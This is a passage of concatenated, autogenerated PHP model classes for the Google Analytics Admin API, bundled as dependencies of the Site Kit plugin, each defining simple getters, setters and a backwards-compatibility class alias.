"License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListSearchAds360LinksResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'searchAds360Links'; /** * @var string */ public $nextPageToken; protected $searchAds360LinksType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaSearchAds360Link::class; protected $searchAds360LinksDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param GoogleAnalyticsAdminV1alphaSearchAds360Link[] */ public function setSearchAds360Links($searchAds360Links) { $this->searchAds360Links = $searchAds360Links; } /** * @return GoogleAnalyticsAdminV1alphaSearchAds360Link[] */ public function getSearchAds360Links() { return $this->searchAds360Links; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListSearchAds360LinksResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListSearchAds360LinksResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaListFirebaseLinksResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'firebaseLinks'; protected $firebaseLinksType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaFirebaseLink::class; protected $firebaseLinksDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1betaFirebaseLink[] */ public function setFirebaseLinks($firebaseLinks) { $this->firebaseLinks = $firebaseLinks; } /** * @return GoogleAnalyticsAdminV1betaFirebaseLink[] */ public function getFirebaseLinks() { return $this->firebaseLinks; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListFirebaseLinksResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaListFirebaseLinksResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaExpandedDataSetFilterStringFilter extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $caseSensitive; /** * @var string */ public $matchType; /** * @var string */ public $value; /** * @param bool */ public function setCaseSensitive($caseSensitive) { $this->caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string */ public function setMatchType($matchType) { $this->matchType = $matchType; } /** * @return string */ public function getMatchType() { return $this->matchType; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaExpandedDataSetFilterStringFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaExpandedDataSetFilterStringFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudienceEventFilter extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $eventName; protected $eventParameterFilterExpressionType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpression::class; protected $eventParameterFilterExpressionDataType = ''; /** * @param string */ public function setEventName($eventName) { $this->eventName = $eventName; } /** * @return string */ public function getEventName() { return $this->eventName; } /** * @param GoogleAnalyticsAdminV1alphaAudienceFilterExpression */ public function setEventParameterFilterExpression(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpression $eventParameterFilterExpression) { $this->eventParameterFilterExpression = $eventParameterFilterExpression; } /** * @return GoogleAnalyticsAdminV1alphaAudienceFilterExpression */ public function getEventParameterFilterExpression() { return $this->eventParameterFilterExpression; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceEventFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudienceEventFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessMetricHeader extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $metricName; /** * @param string */ public function setMetricName($metricName) { $this->metricName = $metricName; } /** * @return string */ public function getMetricName() { return $this->metricName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessMetricHeader::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessMetricHeader'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'userLinks'; protected $userLinksType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink::class; protected $userLinksDataType = 'array'; /** * @param GoogleAnalyticsAdminV1alphaUserLink[] */ public function setUserLinks($userLinks) { $this->userLinks = $userLinks; } /** * @return GoogleAnalyticsAdminV1alphaUserLink[] */ public function getUserLinks() { return $this->userLinks; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessDimensionHeader extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $dimensionName; /** * @param string */ public function setDimensionName($dimensionName) { $this->dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessDimensionHeader::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessDimensionHeader'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudienceEventTrigger extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $eventName; /** * @var string */ public $logCondition; /** * @param string */ public function setEventName($eventName) { $this->eventName = $eventName; } /** * @return string */ public function getEventName() { return $this->eventName; } /** * @param string */ public function setLogCondition($logCondition) { $this->logCondition = $logCondition; } /** * @return string */ public function getLogCondition() { return $this->logCondition; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceEventTrigger::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudienceEventTrigger'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaWebDataStream extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $createTime; /** * @var string */ public $defaultUri; /** * @var string */ public $displayName; /** * @var string */ public $firebaseAppId; /** * @var string */ public $measurementId; /** * @var string */ public $name; /** * @var string */ public $updateTime; /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param string */ public function setDefaultUri($defaultUri) { $this->defaultUri = $defaultUri; } /** * @return string */ public function getDefaultUri() { return $this->defaultUri; } /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setFirebaseAppId($firebaseAppId) { $this->firebaseAppId = $firebaseAppId; } /** * @return string */ public function getFirebaseAppId() { return $this->firebaseAppId; } /** * @param string */ public function setMeasurementId($measurementId) { $this->measurementId = $measurementId; } /** * @return string */ public function getMeasurementId() { return $this->measurementId; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } /** * @return string */ public function getUpdateTime() { return $this->updateTime; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaWebDataStream::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaWebDataStream'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaChangeHistoryChangeChangeHistoryResource extends \Google\Site_Kit_Dependencies\Google\Model { protected $accountType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccount::class; protected $accountDataType = ''; protected $conversionEventType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaConversionEvent::class; protected $conversionEventDataType = ''; protected $dataRetentionSettingsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataRetentionSettings::class; protected $dataRetentionSettingsDataType = ''; protected $dataStreamType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStream::class; protected $dataStreamDataType = ''; protected $firebaseLinkType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaFirebaseLink::class; protected $firebaseLinkDataType = ''; protected $googleAdsLinkType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaGoogleAdsLink::class; protected $googleAdsLinkDataType = ''; protected $measurementProtocolSecretType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaMeasurementProtocolSecret::class; protected $measurementProtocolSecretDataType = ''; protected $propertyType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProperty::class; protected $propertyDataType = ''; /** * @param GoogleAnalyticsAdminV1betaAccount */ public function setAccount(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccount $account) { $this->account = $account; } /** * @return GoogleAnalyticsAdminV1betaAccount */ public function getAccount() { return $this->account; } /** * @param GoogleAnalyticsAdminV1betaConversionEvent */ public function setConversionEvent(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaConversionEvent $conversionEvent) { $this->conversionEvent = $conversionEvent; } /** * @return GoogleAnalyticsAdminV1betaConversionEvent */ public function getConversionEvent() { return $this->conversionEvent; } /** * @param GoogleAnalyticsAdminV1betaDataRetentionSettings */ public function setDataRetentionSettings(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataRetentionSettings $dataRetentionSettings) { $this->dataRetentionSettings = $dataRetentionSettings; } /** * @return GoogleAnalyticsAdminV1betaDataRetentionSettings */ public function getDataRetentionSettings() { return $this->dataRetentionSettings; } /** * @param GoogleAnalyticsAdminV1betaDataStream */ public function setDataStream(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStream $dataStream) { $this->dataStream = $dataStream; } /** * @return GoogleAnalyticsAdminV1betaDataStream */ public function getDataStream() { return $this->dataStream; } /** * @param GoogleAnalyticsAdminV1betaFirebaseLink */ public function setFirebaseLink(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaFirebaseLink $firebaseLink) { $this->firebaseLink = $firebaseLink; } /** * @return GoogleAnalyticsAdminV1betaFirebaseLink */ public function getFirebaseLink() { return $this->firebaseLink; } /** * @param GoogleAnalyticsAdminV1betaGoogleAdsLink */ public function setGoogleAdsLink(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaGoogleAdsLink $googleAdsLink) { $this->googleAdsLink = $googleAdsLink; } /** * @return GoogleAnalyticsAdminV1betaGoogleAdsLink */ public function getGoogleAdsLink() { return $this->googleAdsLink; } /** * @param GoogleAnalyticsAdminV1betaMeasurementProtocolSecret */ public function setMeasurementProtocolSecret(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaMeasurementProtocolSecret $measurementProtocolSecret) { $this->measurementProtocolSecret = $measurementProtocolSecret; } /** * @return GoogleAnalyticsAdminV1betaMeasurementProtocolSecret */ public function getMeasurementProtocolSecret() { return $this->measurementProtocolSecret; } /** * @param GoogleAnalyticsAdminV1betaProperty */ public function setProperty(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaProperty $property) { $this->property = $property; } /** * @return GoogleAnalyticsAdminV1betaProperty */ public function getProperty() { return $this->property; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaChangeHistoryChangeChangeHistoryResource::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaChangeHistoryChangeChangeHistoryResource'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaBatchCreateUserLinksRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'requests'; /** * @var bool */ public $notifyNewUsers; protected $requestsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaCreateUserLinkRequest::class; protected $requestsDataType = 'array'; /** * @param bool */ public function setNotifyNewUsers($notifyNewUsers) { $this->notifyNewUsers = $notifyNewUsers; } /** * @return bool */ public function getNotifyNewUsers() { return $this->notifyNewUsers; } /** * @param GoogleAnalyticsAdminV1alphaCreateUserLinkRequest[] */ public function setRequests($requests) { $this->requests = $requests; } /** * @return GoogleAnalyticsAdminV1alphaCreateUserLinkRequest[] */ public function getRequests() { return $this->requests; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchCreateUserLinksRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaBatchCreateUserLinksRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessQuotaStatus extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var int */ public $consumed; /** * @var int */ public $remaining; /** * @param int */ public function setConsumed($consumed) { $this->consumed = $consumed; } /** * @return int */ public function getConsumed() { return $this->consumed; } /** * @param int */ public function setRemaining($remaining) { $this->remaining = $remaining; } /** * @return int */ public function getRemaining() { return $this->remaining; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessQuotaStatus::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessQuotaStatus'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaUpdateUserLinkRequest extends \Google\Site_Kit_Dependencies\Google\Model { protected $userLinkType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink::class; protected $userLinkDataType = ''; /** * @param GoogleAnalyticsAdminV1alphaUserLink */ public function setUserLink(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink $userLink) { $this->userLink = $userLink; } /** * @return GoogleAnalyticsAdminV1alphaUserLink */ public function getUserLink() { return $this->userLink; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUpdateUserLinkRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaUpdateUserLinkRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaProvisionAccountTicketResponse extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $accountTicketId; /** * @param string */ public function setAccountTicketId($accountTicketId) { $this->accountTicketId = $accountTicketId; } /** * @return string */ public function getAccountTicketId() { return $this->accountTicketId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaProvisionAccountTicketResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaProvisionAccountTicketResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaFirebaseLink extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $createTime; /** * @var string */ public $name; /** * @var string */ public $project; /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setProject($project) { $this->project = $project; } /** * @return string */ public function getProject() { return $this->project; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaFirebaseLink::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaFirebaseLink'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessDimensionValue extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $value; /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessDimensionValue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessDimensionValue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaPropertySummary extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $displayName; /** * @var string */ public $parent; /** * @var string */ public $property; /** * @var string */ public $propertyType; /** * @param string */ public function setDisplayName($displayName) { $this->displayName = $displayName; } /** * @return string */ public function getDisplayName() { return $this->displayName; } /** * @param string */ public function setParent($parent) { $this->parent = $parent; } /** * @return string */ public function getParent() { return $this->parent; } /** * @param string */ public function setProperty($property) { $this->property = $property; } /** * @return string */ public function getProperty() { return $this->property; } /** * @param string */ public function setPropertyType($propertyType) { $this->propertyType = $propertyType; } /** * @return string */ public function getPropertyType() { return $this->propertyType; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaPropertySummary::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaPropertySummary'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAuditUserLinksResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'userLinks'; /** * @var string */ public $nextPageToken; protected $userLinksType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAuditUserLink::class; protected $userLinksDataType = 'array'; /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } /** * @param GoogleAnalyticsAdminV1alphaAuditUserLink[] */ public function setUserLinks($userLinks) { $this->userLinks = $userLinks; } /** * @return GoogleAnalyticsAdminV1alphaAuditUserLink[] */ public function getUserLinks() { return $this->userLinks; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAuditUserLinksResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAuditUserLinksResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 